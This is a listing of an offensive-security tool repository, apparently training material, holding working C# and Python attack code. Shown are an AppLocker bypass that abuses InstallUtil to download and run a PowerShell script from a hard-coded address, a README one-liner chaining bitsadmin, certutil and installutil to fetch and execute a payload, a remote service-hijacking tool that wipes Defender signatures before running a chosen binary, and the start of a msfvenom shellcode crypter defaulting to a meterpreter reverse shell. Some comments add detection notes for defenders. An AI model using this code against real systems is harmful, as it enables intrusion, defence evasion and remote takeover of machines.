├── .gitignore
├── AppLocker Bypass PowerShell Runspace
├── App.config
├── AppLocker Bypass PowerShell Runspace.csproj
├── AppLocker Bypass PowerShell Runspace.sln
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
└── README.md
├── Fileless Lateral Movement
├── App.config
├── Fileless Lateral Movement.csproj
├── Fileless Lateral Movement.sln
├── Program.cs
└── Properties
│ └── AssemblyInfo.cs
├── Linux Shellcode Encoder
└── shellcodeCrypter.py
├── Linux Shellcode Loaders
├── sharedLibrary_LD_LIBRARY_PATH.c
├── sharedLibrary_LD_PRELOAD.c
├── simpleLoader.c
└── simpleXORencoder.c
├── MSSQL
├── App.config
├── MSSQL.csproj
├── MSSQL.sln
├── Program.cs
└── Properties
│ └── AssemblyInfo.cs
├── MiniDump
├── App.config
├── MiniDump.csproj
├── MiniDump.ps1
├── MiniDump.sln
├── Program.cs
└── Properties
│ └── AssemblyInfo.cs
├── PrintSpoofer.NET
├── App.config
├── PrintSpoofer.csproj
├── PrintSpoofer.sln
├── Program.cs
└── Properties
│ └── AssemblyInfo.cs
├── README.md
├── ROT Shellcode Encoder
├── App.config
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── ROT Shellcode Encoder.csproj
└── ROT Shellcode Encoder.sln
├── Sections Shellcode Process Injector
├── App.config
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Sections Shellcode Process Injector.csproj
└── Sections Shellcode Process Injector.sln
├── Shellcode Process Hollowing
├── App.config
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Shellcode Process Hollowing.csproj
└── Shellcode Process Hollowing.sln
├── Shellcode Process Injector
├── App.config
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Shellcode Process Injector.csproj
├── Shellcode Process Injector.ps1
└── Shellcode Process Injector.sln
├── Simple Shellcode Runner
├── App.config
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Simple Shellcode Runner.csproj
├── Simple Shellcode Runner.ps1
├── Simple Shellcode Runner.sln
└── Simple Shellcode Runner.vba
└── XOR Shellcode Encoder
├── App.config
├── Program.cs
├── Properties
└── AssemblyInfo.cs
├── XOR Shellcode Encoder.csproj
└── XOR Shellcode Encoder.sln
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Ll]og/
33 | [Ll]ogs/
34 |
35 | # Visual Studio 2015/2017 cache/options directory
36 | .vs/
37 | # Uncomment if you have tasks that create the project's static files in wwwroot
38 | #wwwroot/
39 |
40 | # Visual Studio 2017 auto generated files
41 | Generated\ Files/
42 |
43 | # MSTest test Results
44 | [Tt]est[Rr]esult*/
45 | [Bb]uild[Ll]og.*
46 |
47 | # NUnit
48 | *.VisualState.xml
49 | TestResult.xml
50 | nunit-*.xml
51 |
52 | # Build Results of an ATL Project
53 | [Dd]ebugPS/
54 | [Rr]eleasePS/
55 | dlldata.c
56 |
57 | # Benchmark Results
58 | BenchmarkDotNet.Artifacts/
59 |
60 | # .NET Core
61 | project.lock.json
62 | project.fragment.lock.json
63 | artifacts/
64 |
65 | # ASP.NET Scaffolding
66 | ScaffoldingReadMe.txt
67 |
68 | # StyleCop
69 | StyleCopReport.xml
70 |
71 | # Files built by Visual Studio
72 | *_i.c
73 | *_p.c
74 | *_h.h
75 | *.ilk
76 | *.meta
77 | *.obj
78 | *.iobj
79 | *.pch
80 | *.pdb
81 | *.ipdb
82 | *.pgc
83 | *.pgd
84 | *.rsp
85 | *.sbr
86 | *.tlb
87 | *.tli
88 | *.tlh
89 | *.tmp
90 | *.tmp_proj
91 | *_wpftmp.csproj
92 | *.log
93 | *.vspscc
94 | *.vssscc
95 | .builds
96 | *.pidb
97 | *.svclog
98 | *.scc
99 |
100 | # Chutzpah Test files
101 | _Chutzpah*
102 |
103 | # Visual C++ cache files
104 | ipch/
105 | *.aps
106 | *.ncb
107 | *.opendb
108 | *.opensdf
109 | *.sdf
110 | *.cachefile
111 | *.VC.db
112 | *.VC.VC.opendb
113 |
114 | # Visual Studio profiler
115 | *.psess
116 | *.vsp
117 | *.vspx
118 | *.sap
119 |
120 | # Visual Studio Trace Files
121 | *.e2e
122 |
123 | # TFS 2012 Local Workspace
124 | $tf/
125 |
126 | # Guidance Automation Toolkit
127 | *.gpState
128 |
129 | # ReSharper is a .NET coding add-in
130 | _ReSharper*/
131 | *.[Rr]e[Ss]harper
132 | *.DotSettings.user
133 |
134 | # TeamCity is a build add-in
135 | _TeamCity*
136 |
137 | # DotCover is a Code Coverage Tool
138 | *.dotCover
139 |
140 | # AxoCover is a Code Coverage Tool
141 | .axoCover/*
142 | !.axoCover/settings.json
143 |
144 | # Coverlet is a free, cross platform Code Coverage Tool
145 | coverage*.json
146 | coverage*.xml
147 | coverage*.info
148 |
149 | # Visual Studio code coverage results
150 | *.coverage
151 | *.coveragexml
152 |
153 | # NCrunch
154 | _NCrunch_*
155 | .*crunch*.local.xml
156 | nCrunchTemp_*
157 |
158 | # MightyMoose
159 | *.mm.*
160 | AutoTest.Net/
161 |
162 | # Web workbench (sass)
163 | .sass-cache/
164 |
165 | # Installshield output folder
166 | [Ee]xpress/
167 |
168 | # DocProject is a documentation generator add-in
169 | DocProject/buildhelp/
170 | DocProject/Help/*.HxT
171 | DocProject/Help/*.HxC
172 | DocProject/Help/*.hhc
173 | DocProject/Help/*.hhk
174 | DocProject/Help/*.hhp
175 | DocProject/Help/Html2
176 | DocProject/Help/html
177 |
178 | # Click-Once directory
179 | publish/
180 |
181 | # Publish Web Output
182 | *.[Pp]ublish.xml
183 | *.azurePubxml
184 | # Note: Comment the next line if you want to checkin your web deploy settings,
185 | # but database connection strings (with potential passwords) will be unencrypted
186 | *.pubxml
187 | *.publishproj
188 |
189 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
190 | # checkin your Azure Web App publish settings, but sensitive information contained
191 | # in these scripts will be unencrypted
192 | PublishScripts/
193 |
194 | # NuGet Packages
195 | *.nupkg
196 | # NuGet Symbol Packages
197 | *.snupkg
198 | # The packages folder can be ignored because of Package Restore
199 | **/[Pp]ackages/*
200 | # except build/, which is used as an MSBuild target.
201 | !**/[Pp]ackages/build/
202 | # Uncomment if necessary however generally it will be regenerated when needed
203 | #!**/[Pp]ackages/repositories.config
204 | # NuGet v3's project.json files produces more ignorable files
205 | *.nuget.props
206 | *.nuget.targets
207 |
208 | # Microsoft Azure Build Output
209 | csx/
210 | *.build.csdef
211 |
212 | # Microsoft Azure Emulator
213 | ecf/
214 | rcf/
215 |
216 | # Windows Store app package directories and files
217 | AppPackages/
218 | BundleArtifacts/
219 | Package.StoreAssociation.xml
220 | _pkginfo.txt
221 | *.appx
222 | *.appxbundle
223 | *.appxupload
224 |
225 | # Visual Studio cache files
226 | # files ending in .cache can be ignored
227 | *.[Cc]ache
228 | # but keep track of directories ending in .cache
229 | !?*.[Cc]ache/
230 |
231 | # Others
232 | ClientBin/
233 | ~$*
234 | *~
235 | *.dbmdl
236 | *.dbproj.schemaview
237 | *.jfm
238 | *.pfx
239 | *.publishsettings
240 | orleans.codegen.cs
241 |
242 | # Including strong name files can present a security risk
243 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
244 | #*.snk
245 |
246 | # Since there are multiple workflows, uncomment next line to ignore bower_components
247 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
248 | #bower_components/
249 |
250 | # RIA/Silverlight projects
251 | Generated_Code/
252 |
253 | # Backup & report files from converting an old project file
254 | # to a newer Visual Studio version. Backup files are not needed,
255 | # because we have git ;-)
256 | _UpgradeReport_Files/
257 | Backup*/
258 | UpgradeLog*.XML
259 | UpgradeLog*.htm
260 | ServiceFabricBackup/
261 | *.rptproj.bak
262 |
263 | # SQL Server files
264 | *.mdf
265 | *.ldf
266 | *.ndf
267 |
268 | # Business Intelligence projects
269 | *.rdl.data
270 | *.bim.layout
271 | *.bim_*.settings
272 | *.rptproj.rsuser
273 | *- [Bb]ackup.rdl
274 | *- [Bb]ackup ([0-9]).rdl
275 | *- [Bb]ackup ([0-9][0-9]).rdl
276 |
277 | # Microsoft Fakes
278 | FakesAssemblies/
279 |
280 | # GhostDoc plugin setting file
281 | *.GhostDoc.xml
282 |
283 | # Node.js Tools for Visual Studio
284 | .ntvs_analysis.dat
285 | node_modules/
286 |
287 | # Visual Studio 6 build log
288 | *.plg
289 |
290 | # Visual Studio 6 workspace options file
291 | *.opt
292 |
293 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
294 | *.vbw
295 |
296 | # Visual Studio LightSwitch build output
297 | **/*.HTMLClient/GeneratedArtifacts
298 | **/*.DesktopClient/GeneratedArtifacts
299 | **/*.DesktopClient/ModelManifest.xml
300 | **/*.Server/GeneratedArtifacts
301 | **/*.Server/ModelManifest.xml
302 | _Pvt_Extensions
303 |
304 | # Paket dependency manager
305 | .paket/paket.exe
306 | paket-files/
307 |
308 | # FAKE - F# Make
309 | .fake/
310 |
311 | # CodeRush personal settings
312 | .cr/personal
313 |
314 | # Python Tools for Visual Studio (PTVS)
315 | __pycache__/
316 | *.pyc
317 |
318 | # Cake - Uncomment if you are using it
319 | # tools/**
320 | # !tools/packages.config
321 |
322 | # Tabs Studio
323 | *.tss
324 |
325 | # Telerik's JustMock configuration file
326 | *.jmconfig
327 |
328 | # BizTalk build output
329 | *.btp.cs
330 | *.btm.cs
331 | *.odx.cs
332 | *.xsd.cs
333 |
334 | # OpenCover UI analysis results
335 | OpenCover/
336 |
337 | # Azure Stream Analytics local run output
338 | ASALocalRun/
339 |
340 | # MSBuild Binary and Structured Log
341 | *.binlog
342 |
343 | # NVidia Nsight GPU debugger configuration file
344 | *.nvuser
345 |
346 | # MFractors (Xamarin productivity tool) working folder
347 | .mfractor/
348 |
349 | # Local History for Visual Studio
350 | .localhistory/
351 |
352 | # BeatPulse healthcheck temp database
353 | healthchecksdb
354 |
355 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
356 | MigrationBackup/
357 |
358 | # Ionide (cross platform F# VS Code tools) working folder
359 | .ionide/
360 |
361 | # Fody - auto-generated XML schema
362 | FodyWeavers.xsd
363 |
--------------------------------------------------------------------------------
/AppLocker Bypass PowerShell Runspace/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/AppLocker Bypass PowerShell Runspace/AppLocker Bypass PowerShell Runspace.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}
8 | Exe
9 | AppLocker_Bypass_PowerShell_Runspace
10 | AppLocker Bypass PowerShell Runspace
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 | False
41 | ..\..\..\..\..\..\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
--------------------------------------------------------------------------------
/AppLocker Bypass PowerShell Runspace/AppLocker Bypass PowerShell Runspace.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "AppLocker Bypass PowerShell Runspace", "AppLocker Bypass PowerShell Runspace.csproj", "{94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {94AEDCE4-D4A2-45DB-B98E-860EE6BE8385}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {2EC8A5D7-7AA0-43D5-A631-D9AEC215E93F}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/AppLocker Bypass PowerShell Runspace/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Management.Automation;
3 | using System.Management.Automation.Runspaces;
4 | using System.Configuration.Install;
5 |
6 | namespace Bypass
7 | {
class Program
{
    // Decoy entry point: running the executable directly only prints a message.
    // The behaviour the project name refers to lives in the Installer subclass
    // further down, which InstallUtil.exe invokes instead of Main.
    static void Main(string[] args)
    {
        var message = "Nothing going on in this binary.";
        Console.WriteLine(message);
    }
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : Installer
{
    // Installer subclass. RunInstaller(true) makes InstallUtil.exe pick this class
    // up, and the README invokes it with "/U", so Uninstall (not Main) is what runs.
    //
    // Defender notes: the script is fetched over plaintext HTTP from a hard-coded
    // address and piped to iex, so the URL (192.168.49.67/run.txt) is a static IoC in
    // the binary. The PowerShell engine is hosted in-process via
    // System.Management.Automation, so no powershell.exe process is created — rely on
    // engine-side telemetry (script block logging / AMSI) and on process-creation
    // events for installutil.exe with /U, not on powershell.exe process events.
    // base.Uninstall is never called, and savedState is unused.
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        String cmd = "(New-Object Net.WebClient).DownloadString('http://192.168.49.67/run.txt') | iex";
        // Open a runspace, attach a PowerShell pipeline to it and run the one-liner;
        // Invoke() blocks until the script returns. Errors are not inspected.
        Runspace rs = RunspaceFactory.CreateRunspace();
        rs.Open();
        PowerShell ps = PowerShell.Create();
        ps.Runspace = rs;
        ps.AddScript(cmd);
        ps.Invoke();
        rs.Close();
    }
}
30 | }
--------------------------------------------------------------------------------
/AppLocker Bypass PowerShell Runspace/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("AppLocker Bypass PowerShell Runspace")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("AppLocker Bypass PowerShell Runspace")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("94aedce4-d4a2-45db-b98e-860ee6be8385")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/AppLocker Bypass PowerShell Runspace/README.md:
--------------------------------------------------------------------------------
1 | # AppLocker Bypass PowerShell Runspace
2 |
3 | The compiled binary can be base64-encoded into a text file with `CertUtil`:
4 |
5 | ```powershell
6 | certutil -encode C:\Path\To\Binary.exe binary-coded.txt
7 | ```
8 |
9 | The following one-liner is then run on the target; it chains Microsoft-signed binaries (`bitsadmin`, `certutil` and `installutil.exe`) to bypass AppLocker.
10 |
11 | ```powershell
12 | cmd.exe /c del C:\Windows\Tasks\enc.txt && del c:\Windows\Tasks\a.exe && bitsadmin /Transfer theJob http://192.168.49.67/PSRunspace-InvokeRun-certutilCoded.txt C:\Windows\Tasks\enc.txt && certutil -decode C:\Windows\Tasks\enc.txt C:\Windows\Tasks\a.exe && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\a.exe
13 | ```
--------------------------------------------------------------------------------
/Fileless Lateral Movement/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Fileless Lateral Movement/Fileless Lateral Movement.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}
8 | Exe
9 | Fileless_Lateral_Movement
10 | Fileless Lateral Movement
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | true
44 |
45 |
46 | bin\x64\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x64
51 | 7.3
52 | prompt
53 | true
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/Fileless Lateral Movement/Fileless Lateral Movement.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Fileless Lateral Movement", "Fileless Lateral Movement.csproj", "{77F955C3-4910-49EA-9CD4-CBF5AD9C071A}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {77F955C3-4910-49EA-9CD4-CBF5AD9C071A}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {005359DF-09A1-4FE2-8F0F-8F91C2BDE1DC}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Fileless Lateral Movement/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace PSLessExec
5 | {
public class Program
{
    // Service-control access masks and start-type values (Winsvc.h).
    public static uint SC_MANAGER_ALL_ACCESS = 0xF003F;
    public static uint SERVICE_ALL_ACCESS = 0xF01FF;
    public static uint SERVICE_DEMAND_START = 0x3;
    public static uint SERVICE_NO_CHANGE = 0xffffffff;

    // Managed mirror of the native QUERY_SERVICE_CONFIG structure filled by
    // QueryServiceConfig; only lpBinaryPathName is read by Main below.
    [StructLayout(LayoutKind.Sequential)]
    public class QUERY_SERVICE_CONFIG
    {
        [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)]
        public UInt32 dwServiceType;
        [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)]
        public UInt32 dwStartType;
        [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)]
        public UInt32 dwErrorControl;
        [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
        public String lpBinaryPathName;
        [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
        public String lpLoadOrderGroup;
        [MarshalAs(System.Runtime.InteropServices.UnmanagedType.U4)]
        public UInt32 dwTagID;
        [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
        public String lpDependencies;
        [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
        public String lpServiceStartName;
        [MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
        public String lpDisplayName;
    };

    // advapi32 service-control imports. OpenSCManager takes a machine name, i.e. the
    // whole sequence below is driven remotely over the service-control RPC interface.
    [DllImport("advapi32.dll", EntryPoint = "OpenSCManagerW", ExactSpelling = true, CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern IntPtr OpenSCManager(string machineName, string databaseName, uint dwAccess);

    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    static extern IntPtr OpenService(IntPtr hSCManager, string lpServiceName, uint dwDesiredAccess);

    [DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern Boolean QueryServiceConfig(IntPtr hService, IntPtr intPtrQueryConfig, UInt32 cbBufSize, out UInt32 pcbBytesNeeded);

    // No CharSet is given here, so the runtime's default (ANSI) binding is used despite
    // the Unicode imports above; SetLastError is also not set, so failures are opaque.
    [DllImport("advapi32.dll", EntryPoint = "ChangeServiceConfig")]
    [return: MarshalAs(UnmanagedType.Bool)]
    public static extern bool ChangeServiceConfigA(IntPtr hService, uint dwServiceType, uint dwStartType, int dwErrorControl, string lpBinaryPathName, string lpLoadOrderGroup, string lpdwTagId, string lpDependencies, string lpServiceStartName, string lpPassword, string lpDisplayName);

    [DllImport("advapi32", SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    public static extern bool StartService(IntPtr hService, int dwNumServiceArgs, string[] lpServiceArgVectors);

    // args: [0] target host, [1] name of an existing service, [2] command line to run.
    public static void Main(string[] args)
    {
        if (args.Length != 3)
        {
            Console.WriteLine("Usage: PSLessExec.exe [Target] [Service] [BinaryToRun]");
            Console.WriteLine("Example: PSLessExec.exe appsrv01 SensorService notepad.exe");
            return;
        }

        // Open remote SCManager. SC_MANAGER_ALL_ACCESS on a remote host requires
        // administrative rights there; the connection and the configuration changes that
        // follow are recorded on the target (Service Control Manager entries in the System
        // log), which is where this activity is most reliably detected.
        // Neither handle below is checked for IntPtr.Zero nor ever closed
        // (no CloseServiceHandle), so they leak until process exit.
        IntPtr SCMHandle = OpenSCManager(args[0], null, SC_MANAGER_ALL_ACCESS);
        Console.WriteLine($"Got handle on SCManager on {args[0]}: {SCMHandle}.");

        // Access target service
        IntPtr schService = OpenService(SCMHandle, args[1], SERVICE_ALL_ACCESS);
        Console.WriteLine($"Got handle on target service {args[1]}: {schService}.");

        // Get current binPath (two passes, first is to determine the buffer size needed)
        // The first call is expected to fail and only report the required size; neither
        // return value is checked. Only lpBinaryPathName is kept — dwStartType is not
        // saved, which matters for pass 3.
        UInt32 dwBytesNeeded;
        QUERY_SERVICE_CONFIG qsc = new QUERY_SERVICE_CONFIG();
        bool bResult = QueryServiceConfig(schService, IntPtr.Zero, 0, out dwBytesNeeded);
        IntPtr ptr = Marshal.AllocHGlobal((int)dwBytesNeeded);
        bResult = QueryServiceConfig(schService, ptr, dwBytesNeeded, out dwBytesNeeded);
        Marshal.PtrToStructure(ptr, qsc);
        String binPathOrig = qsc.lpBinaryPathName;

        // Pass 1: Disable Defender signatures
        // The service image path is pointed at MpCmdRun.exe -RemoveDefinitions -All and the
        // service is started, so the definition wipe runs under the service's account.
        // Defender note: MpCmdRun.exe launched by services.exe with -RemoveDefinitions,
        // right after a binPath change on the same service, is a high-signal detection;
        // Defender also records definition removal in its own operational log (confirm
        // event coverage in your environment).
        String defBypass = "\"C:\\Program Files\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All";
        bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, 0, defBypass, null, null, null, null, null, null);
        Console.WriteLine($"Overwrote service executable to become '{defBypass}', result: {bResult}.");

        // Run the service for Pass 1
        // A plain executable never reports to the SCM, so StartService most likely returns
        // a failure/timeout even though the command line did run; bResult is not checked.
        bResult = StartService(schService, 0, null);
        Console.WriteLine("Launched service, defender signatures should be wiped.");

        // Pass 2: Run the chosen binary
        // Same mechanism with the caller-supplied command line as the image path.
        bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, 0, args[2], null, null, null, null, null, null);
        Console.WriteLine($"Overwrote service executable to become '{args[2]}', result: {bResult}.");

        // Run the service for Pass 2
        bResult = StartService(schService, 0, null);
        Console.WriteLine("Launched service. Check for execution!");

        // Pass 3: Restore original binPath
        // Only the image path is put back; the start type is set to SERVICE_DEMAND_START
        // rather than the original qsc.dwStartType, so a service that was auto-start
        // before stays demand-start afterwards — a residual artifact worth checking
        // during triage, alongside the two intermediate image-path changes.
        bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, 0, binPathOrig, null, null, null, null, null, null);
        Console.WriteLine($"Restored service binary to '{binPathOrig}', result: {bResult}.");
    }
}
101 | }
--------------------------------------------------------------------------------
/Fileless Lateral Movement/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Fileless Lateral Movement")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Fileless Lateral Movement")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("77f955c3-4910-49ea-9cd4-cbf5ad9c071a")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Linux Shellcode Encoder/shellcodeCrypter.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Basic shellcode crypter for C# payloads
4 | # By Cas van Cooten
5 |
6 | import re
7 | import platform
8 | import argparse
9 | import subprocess
10 | from random import randint
11 |
if platform.system() != "Linux":
    exit("[x] ERROR: Only Linux is supported for this utility script.")

class bcolors:
    # ANSI escape sequences used to colour the console output.
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'

# Parse input arguments
# The key is a plain int with no range check; for "xor" it is applied as-is, for "rot"
# the result is masked to one byte.
parser = argparse.ArgumentParser()
parser.add_argument("lhost", help="listener IP to use")
parser.add_argument("lport", help="listener port to use")
parser.add_argument("type", help="the encoding type to use ('xor' or 'rot')", nargs='?', default="xor")
parser.add_argument("key", help="the key to encode the payload with (integer)", type=int, nargs='?', default=randint(1,255))
parser.add_argument("payload", help="the payload type from msfvenom to generate shellcode for (default: windows/x64/meterpreter/reverse_tcp)", nargs='?', default="windows/x64/meterpreter/reverse_tcp")
args = parser.parse_args()

# Generate the shellcode given the preferred payload
# Note: subprocess.run raises FileNotFoundError if msfvenom is not on PATH, so the
# returncode check below only covers a run that started and then failed.
